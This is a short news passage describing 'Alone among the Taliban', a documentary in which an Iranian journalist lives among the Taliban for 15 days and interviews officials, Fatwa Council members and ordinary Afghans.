It was well received around the world as for the first time a journalist had managed to travel to Afghanistan to reveal new details about the Taliban and their activities. The Iranian journalist, who is also the narrator and director of the film, lived among the Taliban for 15 days. “Alone among the Taliban” shows the journalist taking his camera everywhere he goes with the Taliban. He conducts interviews with Taliban’s local authorities and members of the Fatwa Council, an act which has been nearly impossible for filmmakers in the last decade. In the controversial documentary, the Iranian filmmaker talks about his fears while he is among the Taliban. The film shows how they recruit forces and train them. He also interviews ordinary people, asking their take on Taliban fighters and the final mission i.e. ouster of US troops from Afghanistan.
